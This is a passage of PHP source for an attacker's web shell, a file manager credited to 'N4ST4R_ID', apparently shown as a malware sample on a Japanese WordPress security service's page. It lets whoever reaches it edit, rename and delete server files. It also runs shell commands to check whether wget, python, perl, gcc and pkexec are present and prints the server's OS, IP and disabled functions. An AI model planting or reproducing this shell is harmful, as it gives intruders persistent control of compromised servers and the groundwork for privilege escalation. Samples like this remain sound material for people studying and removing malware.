                    echo "<center>" . Size($path . "/" . $files) . "</center>";
                    ?></td>
                      <td nowrap="nowrap" width="150">
                        <center>
                          <?php 
                    if (is_writable($path . "/" . $files)) {
                        $color = "lime";
                    } else {
                        $color = "red";
                    }
                    echo "<font color='{$color}'>" . hi_permission($path . "/" . $folders) . "</font>";
                    ?>
                        </center>
                      </td>
                      <td nowrap="nowrap" width="90">
                        <center><?php 
                    echo "\r\n              <a href='?path={$path}&action=edit&file={$path}/{$files}'><i class='fas fa-edit'></i></a>\r\n              <a href='?path={$path}&action=rename&file={$path}/{$files}'><i class='fas fa-pen'></i></a>\r\n              <a href='?path={$path}&action=delete&file={$path}/{$files}'><i class='fas fa-trash-alt'></i></a>\r\n              ";
                    ?></center>
                      </td>
                    </tr>
                    <?php 
                }
            }
            echo "</tbody></table></div>";
        }
    }
    function saveme($name, $content)
    {
        $open = fopen($name, "w");
        fwrite($open, $content);
        fclose($open);
        return $open;
    }
    function renames($item, $path, $name)
    {
        ?>
            <form method="POST">
              <center>
                <input type="text" name="newname" value="<?php 
        echo $name;
        ?>" class="textinput inputtext">
                <input type="submit" name="rename" value="Rename" class="submit">
              </center>
            </form>
            <?php 
        if (isset($_POST["rename"])) {
            $new = $_POST["newname"];
            if (rename($item, $path . "/" . $new)) {
                echo "<script>alert('{$name} successfully renamed')</script>";
                echo "<script>window.location = '?path={$path}'</script>";
            } else {
                echo "Rename failed";
            }
        }
    }
    function Size($path)
    {
        $bytes = sprintf('%u', filesize($path));
        if ($bytes > 0) {
            $unit = intval(log($bytes, 1024));
            $units = array('B', 'KB', 'MB', 'GB');
            if (array_key_exists($unit, $units) === true) {
                return sprintf('%d %s', $bytes / pow(1024, $unit), $units[$unit]);
            }
        }
        return $bytes;
    }
    function infomin()
    {
        $curl = function_exists("curl_version") ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
        $wget = @shell_exec("wget --help") ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
        $python = @shell_exec("python --help") ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
        $perl = @shell_exec("perl --help") ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
        $ruby = @shell_exec("ruby --help") ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
        $gcc = @shell_exec("gcc --help") ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
        $pkexec = @shell_exec("pkexec --version") ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
        $disfuncs = @ini_get("disable_functions");
        $showit = !empty($disfuncs) ? "<font color='red'>{$disfuncs}</font>" : "<font color='lime'>NONE</font>";
        echo "<div class='infomin wrap'>";
        echo "OS: " . php_uname() . "<br>";
        echo "SERVER IP: " . $_SERVER["SERVER_ADDR"] . "<br>";
        echo "SOFTWARE: " . $_SERVER["SERVER_SOFTWARE"] . "<br>";
        echo "Disabled Functions: {$showit}<br>";
        echo "CURL: {$curl}, WGET: {$wget}, PERL: {$perl}, RUBY: {$ruby}<br>PYTHON: {$python}, GCC: {$gcc}, PKEXEC: {$pkexec}";
        echo "</div>";
    }
    function hi_permission($items)
    {
        $perms = fileperms($items);
        if (($perms & 0xc000) == 0xc000) {
            $info = 's';
        } elseif (($perms & 0xa000) == 0xa000) {
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            $info = 'p';
        } else {
            $info = 'u';
        }
        $info .= $perms & 0x100 ? 'r' : '-';
        $info .= $perms & 0x80 ? 'w' : '-';
        $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
        $info .= $perms & 0x20 ? 'r' : '-';
        $info .= $perms & 0x10 ? 'w' : '-';
        $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
        $info .= $perms & 0x4 ? 'r' : '-';
        $info .= $perms & 0x2 ? 'w' : '-';
        $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
        return $info;
    }
    ?>
        </div>
        <div class="footer">
          Coded & Designed By <a href="https://www.naxtarrr.my.id"><font color="gold">N4ST4R_ID</font></a>
        </div>
        <script>
          const file = document.querySelector('input[type="file"]')
          const label = document.querySelector('label[for="naxx"]')
          file.addEventListener('change', () => {
            if (file.value.length == '0') {
              label.innerText = 'Choose File Here'
            } else if (file.value.length >= '30') {
              value = file.value.substring(0, 30) + "..."
              label.innerText = value
            } else {
              label.innerText = file.value
            }
          })
        </script>
      </body>
    </html><?php 
};
exit;


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.